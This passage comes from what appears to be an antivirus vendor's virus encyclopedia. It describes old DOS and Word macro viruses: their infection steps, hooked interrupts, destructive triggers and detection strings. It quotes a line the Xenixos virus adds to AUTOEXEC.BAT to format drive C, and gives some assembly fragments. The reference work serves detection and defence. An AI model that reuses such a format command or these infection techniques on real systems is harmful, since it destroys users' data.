  27874. During the month of May it adds the following text to
  27875. "C:\AUTOEXEC.BAT":
  27876.  
  27877. "   @echo j format c: /u > nul   "
  27878.  
  27879. This will format the C:\ drive.
  27880.  
  27881. During the month of March, Xenixos tries to activate the
  27882. DOS virus "Neuroquila" by using a DOS DEBUG script.
  27883. This part of the virus is faulty (it tries to create an .EXE file)
  27884. and therefore the DOS-based virus never infects the system.
  27885.  
  27886. The third destructive payload checks the system time, and in
  27887. case of a value larger than 45 in the seconds field, it will add
  27888. the password "XENIXOS" to a saved document.
  27889.  
  27890. Upon printing a document, Xenixos checks the system time
  27891. again, and in case of a value smaller than 30 in the seconds
  27892. field, it will add the following text at the end of the printed
  27893. document:
  27894.  
  27895. "   Nemesis Corp.   "
  27896.  
  27897. Xenixos also replaces the Tools|Macros to make recognition of
  27898. an infected document more difficult (called macro stealth
  27899. technique).  The new code displays the following error
  27900. message instead of the activation of Word's built-in macro
  27901. viewer/editor:
  27902.  
  27903. "   Diese Option ist derzeit leider nicht verfuegbar   "
  27904.  
  27905. In addition, Xenixos changes section "Compatibility" inside
  27906. the win.ini file. It sets the variable "RR2CD" to the value
  27907. "0x0020401", and the variable "Diag$" to "0". The WIN.INI
  27908. variables can be used to deactivate the virus. Setting the
  27909. variable "Diag$" to "1" will prevent most of the destructive
  27910. payloads.
  27911.  
  27912. [Word_Xenixos.B]
  27913. Virus name: Word.Xenixos.B
  27914. Virus Type: Word macro virus
  27915. Number of macros: 11 (24)
  27916. Encrypted: Yes
  27917. Macro names: Drop, Dummy, AutoExec, AutoOpen, DateiOEffnen,
  27918.              ExtrasMakro, DateiBeenden, DateiDrucken,
  27919.              DateiSpeichern, DateiSpeichernUnter,
  27920.              DateiDruckenStandard
  27921. Size of macros: 31342 Bytes
  27922. Place of origin: Germany
  27923. Date of origin: February 1996
  27924. Destructive: Yes
  27925. Common In-The-Wild: No
  27926. Description:
  27927.  
  27928. The difference between this new variant and the original
  27929. Xenixos.A virus is that the first four bytes of the
  27930. "DateiDruckenStandard" macro are changed.
  27931. This new variant still activates and infects further
  27932. documents.
  27933.  
  27934. Xenixos.B only works with the German version of Microsoft
  27935. Word, since it uses language specific macros.
  27936.  
  27937. For more information, please refer to the Xenixos.A virus
  27938. description.
  27939.  
  27940. [Word_Zero.A:De]
  27941. Virus name: Word.Zero.A:De
  27942. Virus Type: Word macro virus
  27943. Number of macros: 9
  27944. Encrypted: Yes
  27945. Macro names: dok, dsu, wrd, extrasmakro, dateischliessen,
  27946.              dateispeichern, dateidokvorlagen,dokumentschliessen,
  27947.              dateispeichernunter
  27948. Size of macros: 727 Bytes
  27949. Place of origin: Germany
  27950. Date of origin: February 1997
  27951. Destructive: No
  27952. Seen In-The-Wild: No
  27953. Description:
  27954.  
  27955. Zero uses a new infection technique. Instead of infecting the
  27956. global template (normal.dot), it creates a file (0.DOT) in the
  27957. "STARTUP" (default: C:\MSOFFICE\WINWORD\STARTUP) directory.
  27958.  
  27959. Zero activates when the "DokumentSchliessen" or
  27960. "Extrasmacro" option is used. After creating the 0.dot file it
  27961. copies its virus macros to the active document when the
  27962. "DateiSpeichern" or "DateiSpeichernUnter" option is used.
  27963.  
  27964. Zero also uses "Extrasmacro" to make recognition of an
  27965. infected document more difficult (called macro stealth technique).
  27966.  
  27967. [Word_Generic]
  27968. Virus name: Word.Generic (any unknown Macro virus)
  27969. Virus type: Word macro virus
  27970. Number of macros: Virus Dependent
  27971. Encrypted: Virus Dependent
  27972. Macro names: Virus Dependent
  27973. Size of macros: Virus Dependent
  27974. Place of origin: Anywhere
  27975. Date of origin: Virus Dependent
  27976. Destructive: Virus Dependent
  27977. Common In-The-Wild: Virus Dependent
  27978. Description:
  27979.  
  27980. "Word.Generic Macro Virus" is the generic name used by Trend Micro's
  27981. antivirus researchers to describe Macro viruses of unknown origin and
  27982. routine detected by the MacroTrap.
  27983.  
  27984. Unlike the strict virus pattern matching methodology used to detect
  27985. known viruses, the Trend Micro MacroTrap identifies Macro viruses that
  27986. have not been previously identified by antivirus researchers. Such
  27987. viruses can exist in either the "Wild" (viruses infecting real users)
  27988. or in the "Zoo," (viruses known only to antivirus researchers).
  27989.  
  27990. Before an antivirus product can detect and clean unknown macro viruses,
  27991. the virus must first be found and isolated. The virus is then analyzed
  27992. to learn it's damage routine and a "signature" is developed so the virus
  27993. can be quickly identified and removed from infected files. The signature
  27994. is incorporated into the virus pattern file which is made available to
  27995. the public, typically at biweekly intervals.
  27996.  
  27997. But because Macro viruses are so easy to create and spread, it is not
  27998. practical to rely solely on virus pattern matching and up-to-date
  27999. signatures to identify the stream of new macro viruses. Considering that
  28000. "virus kits" are now available via the Internet, and considering the
  28001. pervasive reach of e-mail, the only reliable long-term solution against
  28002. the flow of Macro viruses clearly is Trend's rules-based MacroTrap.
  28003.  
  28004. Unknown macro viruses range in complexity and threat from innocuous
  28005. (for example the original Word.Concept virus) to the viscously
  28006. destructive (for example, Word.MDMA, deletes every file on your hard
  28007. drive). When MacroTrap detects and cleans files infected with Word-based
  28008. Macro viruses, both the virus and the infected macro are removed. They
  28009. can be deleted or quarantined, depending on the user's preference.
  28010.  
  28011. Trend Micro is the first to develop this technology and we have
  28012. incorporated it into our entire line of antivirus products to augment
  28013. our award winning 32-bit, multi-threading scan engine.
  28014.  
  28015. [Jerusalem.1244]
  28016. Virus Type: File Virus
  28017. Other Name:
  28018. Virus Length: 1456 bytes
  28019. Virus Reinfect Type: doesn't reinfect
  28020. Place of Origin:
  28021. Virus Memory Type: MCB Type
  28022.  
  28023. PC Vectors Hooked: Int 21h, Int 8h
  28024.  
  28025. Infection Procedure:
  28026. 1) Modifies the allocated memory, BX=5Eh and ES=114Ch then gets
  28027.    the interrupt vector, hooking int 21h, sets it and gets the
  28028.    interrupt vector, this time hooking int 8h then sets it.
  28029. 2) It gets the date and checks whether the date is January 1. If
  28030.    it is, it moves a value of 0h to DS:[0003]; if not, it compares
  28031.    it immediately to DS:[0003].
  28032. 3) It gives back the address 114ch to ES then gets the data stored
  28033.    in ES:[2C] and places it in ES. Then it frees allocated memory,
  28034.    ES=1043 paragraph address of the start of the memory block.
  28035. 4) It gets the child's return code and terminate-and-stay-resident.
  28036.  
  28037. [Jerusalem.1500]
  28038. Virus Type: File Virus
  28039. Virus Length: 2160 bytes
  28040. Virus Reinfect Type: doesn't reinfect
  28041. Place of Origin:
  28042. Virus Memory Type: MCB Type
  28043.  
  28044. PC Vectors Hooked: Int 21h
  28045.  
  28046. Infection Procedure:
  28047. 1) It sets a new date for the system but the specified date is
  28048.    invalid.
  28049. 2) It modifies the allocated memory BX=80h and ES=114Ch.
  28050.  
  28051. [Mummy-2]
  28052. Virus Type: File Virus
  28053. Virus Length: 1648 bytes
  28054. Original Name:
  28055. Place of Origin:
  28056. Virus Memory Type: MCB Type
  28057.  
  28058. PC Vectors Hooked: Int 21h
  28059.  
  28060. Infection Procedure:
  28061. 1) Encrypts the data found in address 1152:049Eh up to 1152:04E5h
  28062.    and forms "PC Virus Mummy Ver. 2.1.Kaohsiung Senior School Tzeng
  28063.    Jau Ming presents" then saves the address of ES to CS:[494], [458],
  28064.    [442], [446], [44A].
  28065. 2) Adds 10h to the address of ES and stores it to CS:[400] and [45C].
  28066. 3) Moves the original header of the program to be ready for execution,
  28067.    modifies the allocated memory, and gets the interrupt vector.
  28068. 4) Saves the value of ES and BX to addresses CS:[044C] and CS:[044E]
  28069.    respectively.
  28070. 5) Executes the child program.
  28071.  
  28072. Detection method: Check for the following message:
  28073. "PC Virus Mummy Ver 2.1 Kaohsiung Senior School Tzeng Jan Ming
  28074. presents"
  28075.  
  28076. [Jers-Zero-Aust.A]
  28077. Virus Type: File Virus
  28078. Virus Length: 2000 bytes
  28079. Trigger Condition: Year must be 1992 up, Day must be Friday
  28080. Virus Reinfect Type: doesn't reinfect
  28081. Place of Origin:
  28082. Virus Memory Type: MCB Type
  28083.  
  28084. PC Vectors Hooked: Int 21h
  28085.  
  28086. Infection Procedure:
  28087. The virus obviously is a softmice type, having to encrypt
  28088. CS:[SI] or 114C:[11E] to 114C:[7AD] by XOR it to 0Eh, then
  28089. encrypt CS:[SI] again but this time it's from 115C:[EB] to
  28090. 115C:[159], XOR it from 1Eh, IEh increments by 1, it loops
  28091. until 6Fh. Then it saves ES which is 114C to 4 different
  28092. locations. Then it adds 10h to 114Ch and saves it in CS:[0115]
  28093. by adding what is stored in it and also in CS:[0111]. Then it
  28094. replaces the data stored in DS:SI to ES:DI which are the
  28095. same. No replacement were made. Then it modifies the allocated
  28096. memory, BX=9Bh and ES=114Ch. Gets the interrupt vector by hooking
  28097. Int 21h, then sets it. Gets the Date and checks if the year is
  28098. 1992 up and the day is Friday. Next, it frees the allocated
  28099. memory then gets the child process. Lastly, it terminates and
  28100. stays resident.
  28101.  
  28102. While memory resident, the virus infects any COM and/or EXE files.
  28103. Does not load if it is already memory resident.
  28104.  
  28105. [MacGyver.2803.A]
  28106. Virus Type: File Virus
  28107. Virus Length: 2803 bytes
  28108. Virus Infect Type: EXE only
  28109. Virus Memory Type: MCB Memory Resident
  28110. Place of Origin:
  28111.  
  28112. PC Vectors Hooked: INT 01h, INT 21h
  28113.  
  28114. Infection Procedure:
  28115. 1) Moves its code to the memory location nearest the MCB chain.
  28116. 2) Makes it memory resident.
  28117. 3) Gives the control to where the code was transferred and then
  28118.    calls the function "Get DOS Version No."
  28119. 4) Hooks INT 1 and INT 21.
  28120. 5) Modifies the Memory Block and allocates 3072 bytes.
  28121.  
  28122. Note:
  28123. This virus hooks INT 01h (a Single Step Interrupt used by debuggers
  28124. like DEBUG and LDR).
  28125.  
  28126. [Backform.2000.A1]
  28127. Virus Type: File Virus
  28128. Virus Length: 1855 bytes
  28129. Virus Infect Type: .COM files
  28130. Virus Memory Type: Non-memory resident
  28131. Place of Origin:
  28132.  
  28133. PC Vectors Hooked:
  28134.  
  28135. Infection Procedure:
  28136. 1) Searches for COMMAND.COM in drive C. If the search fails, the virus
  28137.    terminates. If the file is present, it checks if its first byte is a
  28138.    jump instruction (E9H). If it is, it infects it; if not, the virus
  28139.    terminates leaving no harm to the file.
  28140.    After attaching itself to the file the virus is executed every time
  28141.    the system boots up.
  28142. 2) Checks whether the current month is June. If it is, then it searches
  28143.    and infects .COM files in drive A.
  28144.  
  28145. Damage:
  28146.  
  28147. Detection method: Infected files increase by 2051 bytes.
  28148.  
  28149. Note:
  28150.  
  28151. [Vacsina_2]
  28152. Other Name: VACSINA
  28153. Place of Origin:
  28154. Virus Type: File Virus
  28155. Virus Length:
  28156. Virus Re-infect: Does not reinfect
  28157. Virus Memory Type: MCB Type
  28158.  
  28159. PC Vectors Hooked: INT 21h
  28160.  
  28161. Infection Procedure:
  28162. 1) Loads itself to high memory. Loads 1216 bytes in the memory.
  28163. 2) Infects *.COM and *.EXE files. Copies the virus code to the host
  28164.    program.
  28165.    The virus loads first before running the host program. While in the
  28166.    memory, the virus infects all files that are opened.
  28167.  
  28168. Note:
  28169. The virus tries to create a new segment address for it to run its code.
  28170. This one is used primarily to switch between the host program and the
  28171. virus itself. Using Int 21, Function 50. What it does basically is to
  28172. tell the operating system that the TSR code is the primary process
  28173. rather than the interrupted process of the program. This creates an
  28174. initial execution rather than executing the original code first.
  28175. In this way, the virus is able to run, then it can copy itself to the
  28176. host using Int 21, functions 35 and 25. The copy process is finalized
  28177. when the virus code sets the DTA. In this effect the virus can stick to
  28178. the host program and run in the future.
  28179.  
  28180. [BADSECTOR.3428]
  28181. Virus Name: BADS3428
  28182. Virus Type:  Parasitic, File Virus
  28183. Virus Length: 3,434 bytes
  28184. Original Name: BAD SECTOR 1.2
  28185. Virus Infect Type: .COM files
  28186. Virus Memory Type: High memory resident
  28187. Place of Origin:
  28188.  
  28189. PC Vectors Hooked: INT 8h, INT 16h, INT 26h
  28190.                    INT 21h, INT 25h
  28191.  
  28192. Infection Procedure:
  28193. The virus only infects .COM files. It increases an infected file's size
  28194. by 3,434 bytes. The virus infects the host file by attaching itself at
  28195. the end of the file. The virus becomes memory resident upon loading and
  28196. executing an infected file. While memory resident it can corrupt other
  28197. .COM files on the disk when a file is opened or copied, and sometimes
  28198. causes a memory allocation error. It can also hide the change in the
  28199. size of infected files when resident. The virus replicates its code in
  28200. the high memory at 9EC0:0000 and stays resident there. It hooks INT 21
  28201. and changes its vector to point to its program in the high memory at
  28202. 9EC0:002A. It uses this interrupt to attach itself to the host program.
  28203. It also hooks to other interrupts such as INT 8H (9EC0:0876), INT 16H
  28204. (9EC0:08A5), INT 25H (9EC0:0FBC), and INT 26H (9EC0:0FC6), but no
  28205. payload is seen. The virus just replicates itself and corrupts existing
  28206. .COM files. Text strings can be seen inside the virus code which is:
  28207.  
  28208.   "Bad Sectors 1.2"
  28209.   "COMEXE"
  28210.  
  28211. Damage: Corrupts executable files.
  28212.  
  28213. Detection method: Infected files increase by 3,434 bytes.
  28214.  
  28215. Note:
  28216.  
  28217. [Tai-Pan.438.A]
  28218. Virus Type: File Virus
  28219. Virus Length: Approximately 438 bytes
  28220. Virus Memory Type: High Memory
  28221.  
  28222. PC Vectors Hooked: INT 21h
  28223.  
  28224. Infection Procedure:
  28225. 1) Loads itself to high memory. Loads approximately 512 bytes in
  28226.    the memory.
  28227. 2) Infects *.EXE files. Copies the virus code to the host program.
  28228.    Adding approximately 438 (01B6H) bytes. Loads the virus first
  28229.    before running the host program. While in the memory, EXE files
  28230.    that are opened get infected.
  28231.  
  28232. The virus reacts ordinarily by allocating space in the memory before
  28233. infecting files, using Int 21 (48). Nothing extraordinary happens.
  28234. It just attaches its code to the host program after it is loaded from
  28235. the memory.
  28236.  
  28237. Damage:
  28238.  
  28239. Symptoms: Free memory decreases. Increase in file size.
  28240. May display:
  28241.  
  28242.          "[Whisper Presenterar Tai-Pan]"
  28243.  
  28244. which appears in the virus code.
  28245.  
  28246. Detection method: Check for the above message.
  28247.  
  28248. Note:
  28249.  
  28250. [Tai-Pan.666]
  28251. Virus Type: File Virus
  28252. Virus Length: Approximately 666 bytes
  28253. Virus Memory Type: High Memory
  28254.  
  28255. PC Vectors Hooked: INT 21h
  28256.  
  28257. Infection Procedure:
  28258. 1) Loads itself to high memory. Loads approximately 710 bytes in
  28259.    the memory.
  28260. 2) Infects *.EXE files. Copies the virus code to the host program,
  28261.    adding approximately 666 (029AH) bytes. Loads the virus first
  28262.    before running the host program. While in the memory, EXE files
  28263.    that are opened get infected.
  28264.  
  28265. The virus reacts ordinarily by allocating space in the memory before
  28266. infecting files, using Int 21 (48). Nothing extraordinary happens.
  28267. It just attaches its code to the host program after it is loaded from
  28268. the memory.
  28269.  
  28270. Damage:
  28271.  
  28272. Symptom: Free memory decreases. Increase in file size.
  28273. May display:
  28274.  
  28275.  "DOOM2,EXE. Illegal DOOM II signature"
  28276.  "Your version of DOOM2.EXE matches the illegal RAZOR release of DOOM2"
  28277.  "Say bye-bye HD"
  28278.  "The programmer of DOOM II DEATH is in no way affiliated with ID
  28279.   Software."
  28280.  "ID Software is in no way affiliated with DOOM II DEATH."
  28281.  
  28282. which appears in the virus code.
  28283.  
  28284. Detection method: Check for the above messages.
  28285.  
  28286. Note:
  28287.  
  28288. [Keypress-9]
  28289. Virus Type: File Virus (COM and EXE files)
  28290. Place of Origin:
  28291. Virus Memory Type:
  28292.  
  28293. PC Vectors Hooked: INT 21h
  28294.  
  28295. Infection Procedure:
  28296. The virus hooks INT 21h to infect COM and EXE files,
  28297. increasing their sizes by 2 kbytes. After the virus is
  28298. executed, it waits for an EXE and/or COM files to infect.
  28299. It infects all COM and EXE files except COMMAND.COM.
  28300. Infected files contain the following messages:
  28301.  
  28302.    "This is an [ illegal copy ] of keypress virus remover"
  28303.    "Systems Halted."
  28304.    "Eternal Fair"
  28305.  
  28306. The virus doesn't reinfect if the file being executed
  28307. is already infected.
  28308.  
  28309. [BBS.1643]
  28310. Virus Type: File Virus, Soft Mice
  28311. Other Name: Major BBS
  28312. Virus Length: 1642-1644 bytes
  28313. Virus Infect Type: EXE files only
  28314. Virus Memory Type: High Memory Resident
  28315. Place of Origin:
  28316.  
  28317. PC Vectors Hooked:  INT 21h, INT 8h
  28318.  
  28319. Infection Procedure:
  28320. 1) Decrypts 1595 bytes of its virus code.
  28321. 2) Checks if the file executed is already infected. If it is not,
  28322.    the virus copies its encrypted code onto it. Then it copies its
  28323.    1644 bytes of code to the high memory but allocates 30384 bytes in
  28324.    memory.
  28325. 3) Gets the DOS Re-entrancy Flag which DOS looks up when INT 21h is
  28326.    used.
  28327. 4) Hooks INT 21 and INT 8 and then terminates.
  28328.  
  28329. Damage: There is no evident damage this virus can do but will
  28330. decrypt this message:
  28331.  
  28332.            "The Major BBS Virus"
  28333.            "created by Major tomTugger"
  28334.  
  28335. Detection method: This virus will display a write-protect error when
  28336. a read command is executed (like opening a file).
  28337.  
  28338. [Maltese_Amoeba]
  28339. Virus Type: File Virus, Soft Mice
  28340. Other Name: AMOEBA
  28341. Virus Length: 3589 bytes
  28342. Trigger Condition: Nov. 1, Mar. 15
  28343. Virus Re-infect:
  28344. Virus Memory Type: High Memory Resident
  28345. Place of Origin: MALTA
  28346.  
  28347. PC Vectors Hooked:  INT 21h
  28348.  
  28349. Infection Procedure:
  28350. 1) Decrypts 1184 bytes of its virus code.
  28351. 2) Checks if the executed file is an uninfected EXE or COM file. If
  28352.    it is, the virus infects it.
  28353. 3) Allocates 4096 bytes in the high memory area and transfers 3589
  28354.    bytes of its virus code to HMA.
  28355. 4) Hooks INT 21.
  28356. 5) Returns control to the original routine.
  28357.  
  28358. Damage:
  28359. If the system date is November 1 or March 15, the virus formats
  28360. the hard disk by overwriting the first 4 sectors of every track
  28361. with garbage. This destroys the boot sector and the File Allocation
  28362. Table. This also makes the hard disk a non-DOS partition disk.
  28363. The virus also formats the floppy disk (if present).
  28364.  
  28365. The virus will also display garbage and random screen colors.
  28366.  
  28367. This message can be found in the virus code:
  28368.  
  28369.         "AMOEBA virus by the Hacker Twins (c) 1991"
  28370.         "This is nothing, wait for the release of"
  28371.         "AMOEBA II-the universal infector hidden to"
  28372.         "any eye but ours!"
  28373.         "Dedicated to the University of Malta-the worst"
  28374.         "educational system in the universe and destroyer"
  28375.         "of 5x2 years of human life"
  28376.  
  28377. This message will appear on the screen after the virus has trashed
  28378. the hard disk:
  28379.  
  28380.         "To see a world in a grain of sand,
  28381.         And a heaven in a wild flower
  28382.         Hold Infinity in the palm of your hand
  28383.         And Eternity in an hour."
  28384.  
  28385.         THE VIRUS   16/3/91
  28386.  
  28387. [Vampiro.A]
  28388. Virus Type: File Virus
  28389. Virus Length:
  28390. Virus Memory Type: High Memory
  28391.  
  28392. PC Vectors Hooked: INT 21h
  28393.  
  28394. Infection method:
  28395. 1) Gets the system date and time. It executes the virus code if
  28396.    the current month is earlier than June, or the time is earlier
  28397.    than 10 pm.
  28398.  
  28399. The virus infects *.COM files not in the root directory. It opens
  28400. and searches subdirectories where it looks for *.COM files to infect.
  28401. It attaches itself to the host program.
  28402.  
  28403. Damage:
  28404. The virus infects files in the subdirectory.
  28405. If trigger date and time are not satisfied, it displays:
  28406.  
  28407.    "Zarathustra & Drako les comunican que llego la hora de ir a
  28408.    dormir. Shh! Vampiro Virus."
  28409.  
  28410. Notes:
  28411. 1) Non-resident virus.
  28412. 2) Does not use memory allocation.
  28413. 3) Runs directly.
  28414.  
  28415. Symptom:
  28416. The following strings can be found in the code:
  28417.  
  28418.  "Zarathustra & Drako les comunican que llego la hora de ir
  28419.  a dormir. Shh! Vampiro Virus."
  28420.  "Command.com all xray, memory allocation error."
  28421.  "Cannot uninstall xray, it has not been installed."
  28422.  "???????????"
  28423.  
  28424. [Mange-Tout.1099]
  28425. Virus Type: File Type (EXE files)
  28426. Virus Length:
  28427. Virus Memory Type: High Memory Resident
  28428. Place of Origin:
  28429.  
  28430. PC Vectors Hooked: INT 08h, INT 09h, INT 21h
  28431.  
  28432. Infection Procedure:
  28433. 1) Copies its code to address 0054:0000.
  28434. 2) Does a series of ins and outs at port 21h.
  28435. 3) Hooks INT 8, 9, and 21.
  28436. 4) Checks the carrier file if it is an EXE file. If it is, the virus
  28437.    infects it by transferring the first 198 bytes of the original code
  28438.    at the end of the file and transfering the virus code at the
  28439.    beginning.
  28440.  
  28441. [TP39VIR]
  28442. Other Name: Yank-39
  28443. Virus Type: File Virus
  28444. Virus Length: Approximately 2768 bytes
  28445. Virus Memory Type:
  28446. Trigger: Triggers if time is 5:00 pm of any day.
  28447.          Plays part of the song: "Jack and Jill"
  28448. Run Directly: Loads virus code to high memory
  28449.  
  28450. PC Vectors Hooked: Int 21
  28451.  
  28452. Infection Procedure:
  28453. 1) Loads itself to high memory, allocating 2896 bytes.
  28454. 2) Moves 2768 bytes onto the memory.
  28455. 3) Infects *.COM and *.EXE files. Copies the virus code to the
  28456.    host program. Loads the virus first before running the host
  28457.    program.
  28458.  
  28459. [Yank-D.TP.44.A]
  28460. Other Name: Yank-44A
  28461. Virus Type: File Virus
  28462. Virus Length: Approximately 2880 bytes
  28463. Virus Memory Type:
  28464. Trigger Condition: Triggers if time is 5:00 pm of any day.
  28465.                    Plays part of the song: "Jack and Jill"
  28466. Run Directly: Loads virus code to high memory
  28467.  
  28468. PC Vectors Hooked: Int 21
  28469.  
  28470. Infection Procedure:
  28471. 1) Loads itself to high memory, allocating 3008 bytes.
  28472. 2) Moves 2880 bytes onto the memory.
  28473. 3) Infects *.COM and *.EXE files. Copies the virus code to the
  28474.    host program. Loads the virus first before running the host
  28475.    program.
  28476.  
  28477. [Xpeh.4928]
  28478. Other Name: Yankxpeh
  28479. Virus Type: File Virus
  28480. Virus Length: Approximately 4768 bytes
  28481. Place of Origin:
  28482. Run Directly: Loads virus code to high memory
  28483.  
  28484. PC Vectors Hooked: Int 21
  28485.  
  28486. Infection Procedure:
  28487. 1) Loads itself to high memory, allocating 4944 bytes.
  28488. 2) Moves 4768 bytes onto the memory.
  28489. 3) Infects *.COM and *.EXE files. Copies the virus code to the
  28490.    host program. Loads the virus first before running the host
  28491.    program.
  28492.  
  28493. [Tanpro.5241]
  28494. Virus Name: Tanpro
  28495. Virus Type: File Virus
  28496. Virus Length: Approximately 524 bytes
  28497. Virus Memory Type: High Memory
  28498. Place of Origin:
  28499.  
  28500. PC Vectors Hooked: Int 21, Int 27
  28501.  
  28502. Infection Procedure:
  28503. Uses TSR, Int 27. Allocates 3104 bytes (using MEM) of the memory.
  28504. Creates a hidden un-named file within the root directory with a size
  28505. of 10000 bytes. Within the code is the string "This file is
  28506. infected..." Executes this program, deletes it afterwards then calls
  28507. Int 27, to retain its possession of the memory for further infection
  28508. of other files. Infects *.COM and *.EXE files. Copies the virus code
  28509. to the host program, adding approximately 524 bytes. Loads the virus
  28510. first before running the host program.
  28511.  
  28512. The virus, while memory resident, infects any executed *.COM and
  28513. *.EXE files. It does not do anything special. It just replicates when
  28514. it is memory resident. Infects file only if it is executed.
  28515.  
  28516. Damage:
  28517. 1) Free memory decreases by approximately 3104 bytes.
  28518. 2) Increases file size by approximately 524 bytes.
  28519.  
  28520. Symptom:
  28521. 1) Delay in program execution due to virus activity.
  28522. 2) Text string: "(c) tanpro'94" appears within the virus code.
  28523.  
  28524. Detection method: Locate mentioned text string.
  28525.  
  28526. [Manzon]
  28527. Virus Type: File Virus, Soft Mice
  28528. Virus Length: 1712 Bytes
  28529. Virus Infect Type: COM files
  28530. Virus Memory Type: High Memory Resident
  28531. Place of Origin:
  28532.  
  28533. PC Vectors Hooked:  INT 21h
  28534.  
  28535. Infection Procedure:
  28536. 1) Decrypts 1417 bytes of its code and then allocates 1728 bytes
  28537.    in HMA.
  28538. 2) Transfers its code to HMA with a size of 1712 bytes.
  28539. 3) Hooks INT 21.
  28540. 4) Returns control to the original routine.
  28541.  
  28542. The virus code has text strings of programs and dos utilities which the
  28543. virus uses to compare with the target file. This method makes detection
  28544. more difficult.
  28545.  
  28546. [Kaos4.A]
  28547. Virus Type: File Virus
  28548. Virus Length:
  28549. Place of Origin:
  28550. Virus Memory Type: Non Resident
  28551.  
  28552. PC Vectors Hooked :
  28553.  
  28554. Infection Procedure:
  28555. 1) Sets the disk transfer area, 114C:0816h.
  28556. 2) Tries to infect COM and EXE files in the same directory and
  28557.    other directories specified in PATH. It uses the Find First
  28558.    Match Directory Entry, there it infects all EXE and COM files.
  28559.    Then the Next Directory Entry, there it also infects all
  28560.    EXE and COM files.
  28561. 3) Sets DTA again, 114C:0080h.
  28562. 4) Displays the message stored in the virus code.
  28563.  
  28564. [Sarampo.B]
  28565. Virus Type: File Virus (COM and EXE files)
  28566. Eff Length : 1371 bytes
  28567.  
  28568. Symptoms :
  28569. Increase in size of infected COM and EXE files by 1371 bytes
  28570. and decrease in available memory by 1664 bytes.  Executing programs
  28571. may slow down due to the infection procedure of the virus.
  28572.  
  28573. General Comments:
  28574. During the first infection, the virus allocates 1664 bytes in the
  28575. memory and transfers its code to HMA.  It also hooks INT 21 and INT 24.
  28576. Then rebuilds the carrier program while it is memory resident so it can
  28577. return control to the original routine.
  28578.  
  28579. This virus infects all opened, executed and copied COM and EXE
  28580. files. It also changes the file's time to 1:13pm.
  28581.  
  28582. SARAMPO displays some garbage on the screen if the system date
  28583. is April 25, December 25 or October 12, and the virus is already
  28584. resident for about 2 minutes.
  28585.  
  28586. This text is found in the virus code:
  28587.  
  28588.       "Do you like this Screen Saver ? I hope so."
  28589.       "Created by Sarampo virus"
  28590.  
  28591. [Hare.7610]
  28592. Virus Type: File Virus
  28593. Virus Length:
  28594. Virus Infect Type: COM and EXE files and
  28595.                    Master Boot Record
  28596. Place of Origin:
  28597. Virus Memory Type: High Memory
  28598.  
  28599. PC Vectors Hooked: Int 21h
  28600.  
  28601. Infection Procedure:
  28602. 1) NOTs the data in CS:[DI] or 115C:2822 with a CX value of ED5h.
  28603.    Then another encryption starting at 115C:29B2 with a CX value of
  28604.    E0Eh,
  28605. 2) XORs AX with an initial value of 2726.
  28606. 3) Increments AH and AL by 2h.
  28607. 4) Gets the memory size service with a return value of AX=280h.
  28608. 5) Gets the dos variable and loads it to the high memory from 115C:2810
  28609.    to 9DDE:0 with a size of 1DBAh. A message can be found there which
  28610.    reads: "HDEuthanasia by Demon Emperor: Hare Krsua, hare, hare"
  28611. 6) Hooks Int 21h and sets it. From there it infects the master boot
  28612.    record.
  28613.  
  28614. [Hare.7750]
  28615. Virus Type: File Virus
  28616. Virus Length:
  28617. Virus Infect Type: COM and EXE files and
  28618.                    Master Boot Record
  28619. Place of Origin:
  28620. Virus Memory Type: High Memory
  28621.  
  28622. PC Vectors Hooked: Int 21h
  28623.  
  28624. Infection Procedure:
  28625. 1) Encrypts data, address 115C:[2824], 3866 times by using the NOT
  28626.    operand. Another loop in 115C:[29B2], 3667 times by XORing
  28627.    to AX. AH and AL are incremented by 2h, thus producing:
  28628.    "INFECTUM.COM.HOSTA.COMCOM.COMMAND\SYSTEM\IOSUBSYS\HSFLOP.PDR"
  28629. 2) Gets the memory size, 640 bytes.
  28630. 3) Gets the dos variable.
  28631. 4) Loads the code to the high memory, from 115C:2810 to 9DD5:0000
  28632.    (7750 bytes).
  28633. 5) Returns the disk drive parameters to read the hard disk.
  28634.    Reads disk sectors, 1 sector to be transferred to address
  28635.    9DD5:2096, track no. 108, sector no. 1, head no. 125.
  28636. 6) Executes the following codes:
  28637.  
  28638.            XOR AL,AL
  28639.            OUT 43,AL
  28640.            JMP 94C
  28641.            IN  AL,40
  28642.            MOV AH,AL
  28643.            IN  AL,40
  28644.            XOR AL,AH
  28645.            XCHG AL,AH
  28646.  
  28647. The virus first infects the MBR, from there it waits for COM
  28648. and EXE files to infect.
  28649.  
  28650. Damage: When rebooting, the computer reboots repeatedly.
  28651.  
  28652. [Markt]
  28653. Virus Type: File Virus, Soft Mice
  28654. Other Name: WERBE
  28655. Virus Length: 1533 bytes
  28656. Original Name: WERBE
  28657. Place of Origin: Germany
  28658.  
  28659. PC Vectors Hooked:
  28660.  
  28661. Infection Procedure:
  28662. 1) Decrypts 1412 bytes of its virus code.
  28663. 2) Gets the DTA address and then sets it.
  28664. 3) Checks the current drive and then overwrites the boot sector
  28665.    of the hard disk.
  28666.  
  28667. Damage:
  28668. Upon loading the virus it overwrites all the boot sectors
  28669. of all fixed drives, thus destroying them.
  28670.  
  28671. This message can be found in the virus code:
  28672.  
  28673.     "Ups, all Disks from"
  28674.     "C: to Z: Trashed!"
  28675.     "Sorry about that!"
  28676.     "to all Military Inventors its time to give us the Tachyonator!"
  28677.  
  28678.     "MediaMarkt WerbeVirus '94 (c)"
  28679.     "MediaMarkt Germany The Wizard"
  28680.  
  28681. Note: After destroying the hard disk the virus executes the
  28682. following code:
  28683.  
  28684.        17AC:0575  JMP 0575
  28685.  
  28686. This code performs an endless loop.
  28687.  
  28688. [Leon.1217]
  28689. Virus Type: Polymorphic, File Virus (EXE files)
  28690. Virus Length: 1,224-1,253 bytes
  28691. Virus Memory Type: Non-memory resident
  28692. Place of Origin:
  28693.  
  28694. PC Vectors Hooked: INT 24h
  28695.  
  28696. Infection Procedure:
  28697. The virus only infects .EXE files. It increases an infected file's
  28698. size by 1,224-1,253 bytes. The virus infects the host file by attaching
  28699. itself at the end of the file. As a polymorphic virus, it first
  28700. decrypts its program using XOR 1410H to each encrypted word. Then it
  28701. hooks INT 24H to disable the disk write error display when it is
  28702. infecting its host file. Then it checks the current disk directory and
  28703. searches for EXE files. After finding a file it changes its attribute
  28704. to archive. Then it checks for the current time. If it is between the
  28705. 7th-60th minute of an hour, and between the 30th-60th second of a
  28706. minute, the virus closes the file and does not infect. Any time beyond
  28707. that, the virus infects every EXE file in all the subdirectories of
  28708. the current drive. The virus is not memory resident. It only activates
